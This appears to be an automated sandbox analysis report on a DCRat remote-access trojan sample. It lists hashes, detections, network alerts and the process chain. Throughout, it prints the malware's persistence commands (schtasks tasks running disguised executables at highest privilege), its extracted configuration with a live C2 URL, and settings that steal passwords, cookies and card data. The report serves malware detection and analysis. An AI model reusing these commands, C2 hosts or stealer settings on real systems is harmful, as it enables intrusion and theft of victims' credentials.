Windows Analysis Report
findme.exe

Overview

General Information

Sample name: findme.exe
Analysis ID: 1589982
MD5: 4fabffd3dfad2d1e11ae2317b40b6e4a
SHA1: df2ce294dc75060632bfb45add20e69ccc9396c1
SHA256: 079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a
Tags: DCRat, exe, NyashTeam, user-MalHunter3

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • findme.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\findme.exe" MD5: 4FABFFD3DFAD2D1E11AE2317B40B6E4A)
    • wscript.exe (PID: 7028 cmdline: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7340 cmdline: C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • webnetdhcp.exe (PID: 7384 cmdline: "C:\runtimebrokerHost\webnetdhcp.exe" MD5: EEC01D18C981A5973DA10C8CBAC73764)
          • schtasks.exe (PID: 7800 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7816 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7840 cmdline: schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7888 cmdline: schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7928 cmdline: schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
Source | Rule | Description | Author | Strings
0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: webnetdhcp.exe PID: 7384 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\runtimebrokerHost\webnetdhcp.exe, ProcessId: 7384, TargetFilename: C:\Program Files (x86)\google\RuntimeBroker.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe", CommandLine: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\findme.exe", ParentImage: C:\Users\user\Desktop\findme.exe, ParentProcessId: 7120, ParentProcessName: findme.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe", ProcessId: 7028, ProcessName: wscript.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\runtimebrokerHost\webnetdhcp.exe", ParentImage: C:\runtimebrokerHost\webnetdhcp.exe, ParentProcessId: 7384, ParentProcessName: webnetdhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f, ProcessId: 7800, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T12:50:56.209417+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.7 | 52544 | 37.44.238.250 | 80 | TCP
2025-01-13T12:50:08.371679+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 208.95.112.1 | 80 | TCP
2025-01-13T12:50:09.840414+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 208.95.112.1 | 80 | TCP
2025-01-13T12:51:50.731487+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 52553 | 208.95.112.1 | 80 | TCP
2025-01-13T12:50:56.723717+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 37.44.238.250 | 80 | 192.168.2.7 | 52544 | TCP
2025-01-13T12:51:57.518157+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 37.44.238.250 | 80 | 192.168.2.7 | 52544 | TCP
2025-01-13T12:50:59.229396+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.7 | 52549 | 149.154.167.220 | 443 | TCP

AV Detection

Source: findme.exe | Avira: detected
Source: http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb | Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\jones\AppData\Local\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\7-Zip\SearchApp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\runtimebrokerHost\webnetdhcp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Google\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\runtimebrokerHost\lsass.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"0\":\"^\",\"e\":\"%\",\"R\":\"_\",\"Y\":\">\",\"F\":\"#\",\"2\":\"<\",\"d\":\" \",\"G\":\"!\",\"x\":\"~\",\"I\":\";\",\"O\":\"*\",\"D\":\"$\",\"N\":\",\",\"6\":\".\",\"v\":\"(\",\"j\":\"&\",\"C\":\"-\",\"n\":\"@\",\"l\":\")\",\"J\":\"`\",\"9\":\"|\"}", "PCRT": "{\"1\":\".\",\"F\":\";\",\"5\":\"*\",\"0\":\"$\",\"Q\":\",\",\"l\":\"!\",\"2\":\"_\",\"U\":\"#\",\"B\":\">\",\"j\":\"@\",\"T\":\"|\",\"k\":\")\",\"J\":\"&\",\"d\":\"<\",\"z\":\" \",\"g\":\"~\",\"W\":\"-\",\"b\":\"%\",\"p\":\"`\",\"E\":\"(\",\"N\":\"^\"}", "TAG": "Site", "MUTEX": "DCR_MUTEX-F4bn3334YDephuxEW1IL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb", "H2": "http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb", "T": "0"}
Source: C:\Program Files (x86)\Google\RuntimeBroker.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\7-Zip\SearchApp.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\RuntimeBroker.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Users\jones\AppData\Local\WmiPrvSE.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe | ReversingLabs: Detection: 87%
Source: C:\runtimebrokerHost\lsass.exe | ReversingLabs: Detection: 87%
Source: C:\runtimebrokerHost\webnetdhcp.exe | ReversingLabs: Detection: 87%
Source: findme.exe | Virustotal: Detection: 69%
Source: findme.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exe | Joe Sandbox ML: detected
Source: C:\Users\jones\AppData\Local\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\SearchApp.exe | Joe Sandbox ML: detected
Source: C:\runtimebrokerHost\webnetdhcp.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\runtimebrokerHost\lsass.exe | Joe Sandbox ML: detected
Source: findme.exe | Joe Sandbox ML: detected
Source: findme.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\7-Zip\SearchApp.exe
Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\7-Zip\38384e6a620884
Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe
Source: C:\runtimebrokerHost\webnetdhcp.exe | Directory created: C:\Program Files\Windows Defender\Platform\9e8d7a4ca61bd9
Source: findme.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: findme.exe
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004CA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004DB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004EAAA8 FindFirstFileExA

Networking

Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:52544 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 37.44.238.250:80 -> 192.168.2.7:52544
Source: Network traffic | Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.7:52549 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb
Source: global traffic | TCP traffic: 192.168.2.7:52338 -> 1.1.1.1:53
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49699 -> 208.95.112.1:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:52553 -> 208.95.112.1:80
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003303000.00000004.00000800.00020000.00000000.sdmp, webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003303000.00000004.00000800.00020000.00000000.sdmp, webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\runtimebrokerHost\webnetdhcp.exe | Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Source: C:\runtimebrokerHost\webnetdhcp.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004C718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exe
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\AppReadiness\66583f2b23107c
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exe
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Media\Festival\66583f2b23107c
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exe
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Provisioning\Packages\66583f2b23107c
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exe
Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Windows\Tasks\66583f2b23107c
          Source: C:\Users\user\Desktop\findme.exeCode function: String function: 004DE28C appears 35 times
          Source: C:\Users\user\Desktop\findme.exeCode function: String function: 004DED00 appears 31 times
          Source: C:\Users\user\Desktop\findme.exeCode function: String function: 004DE360 appears 52 times
          Source: webnetdhcp.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WmiPrvSE.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: lsass.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe0.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe1.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: RuntimeBroker.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe2.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe3.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe4.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: SearchApp.exe.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: RuntimeBroker.exe0.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe5.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: RuntimeBroker.exe1.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WGNWJePMcpkvwPkbkGq.exe6.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: findme.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs findme.exe
          Source: findme.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.adwa.evad.winEXE@30/33@3/1
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004C6EC9 GetLastError,FormatMessageW,0_2_004C6EC9
          Source: C:\Users\user\Desktop\findme.exe | Code function: 0_2_004D9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_004D9E1C
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Program Files (x86)\google\RuntimeBroker.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | File created: C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Mutant created: NULL
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\6f6d7b64b257ca9e3ed464a4d4958f7deb58efdb
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
          Source: C:\Users\user\Desktop\findme.exe | Command line argument: sfxname 0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exe | Command line argument: sfxstime 0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exe | Command line argument: STARTDLG 0_2_004DD5D4
          Source: C:\Users\user\Desktop\findme.exe | Command line argument: xjQ 0_2_004DD5D4
          Source: findme.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: findme.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\runtimebrokerHost\webnetdhcp.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (42 identical entries in the report)
          Source: C:\Users\user\Desktop\findme.exe | File read: C:\Windows\win.ini
          Source: C:\Users\user\Desktop\findme.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: findme.exe | Virustotal: Detection: 69%
          Source: findme.exe | ReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\findme.exe | File read: C:\Users\user\Desktop\findme.exe
          Source: unknown | Process created: C:\Users\user\Desktop\findme.exe "C:\Users\user\Desktop\findme.exe"
          Source: C:\Users\user\Desktop\findme.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\runtimebrokerHost\webnetdhcp.exe "C:\runtimebrokerHost\webnetdhcp.exe"
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f
          Source: C:\Users\user\Desktop\findme.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\runtimebrokerHost\webnetdhcp.exe "C:\runtimebrokerHost\webnetdhcp.exe"
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: unknown unknown (9 identical entries in the report)
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
          Source: C:\runtimebrokerHost\webnetdhcp.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f
